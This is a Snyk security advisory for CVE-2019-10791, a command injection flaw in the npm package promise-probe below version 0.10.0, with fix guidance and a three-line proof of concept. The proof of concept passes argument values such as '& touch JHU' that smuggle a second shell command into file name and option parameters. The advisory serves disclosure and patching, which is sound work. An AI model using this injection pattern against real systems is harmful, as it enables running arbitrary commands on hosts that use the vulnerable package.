Command Injection Affecting promise-probe package, versions <0.10.0
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.48% (76th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-PROMISEPROBE-546816
- published 6 Feb 2020
- disclosed 4 Feb 2020
- credit JHU System Security Lab
Introduced: 4 Feb 2020
CVE-2019-10791 Open this link in a new tabHow to fix?
Upgrade promise-probe
to version 0.10.0 or higher.
Overview
promise-probe is a FFprobe wrapper.
Affected versions of this package are vulnerable to Command Injection via the ffprobe(file)
and createMuteOgg(outputFile, options)
functions.
file
,outputFile
,options
can be controlled by users without any sanitization
PoC by JHU System Security Lab
var root = require("promise-probe");
root.ffprobe("& touch JHU");
root.createMuteOgg("123",{seconds:"& touch JHU &"});
root.createMuteOgg("& touch JHU",{});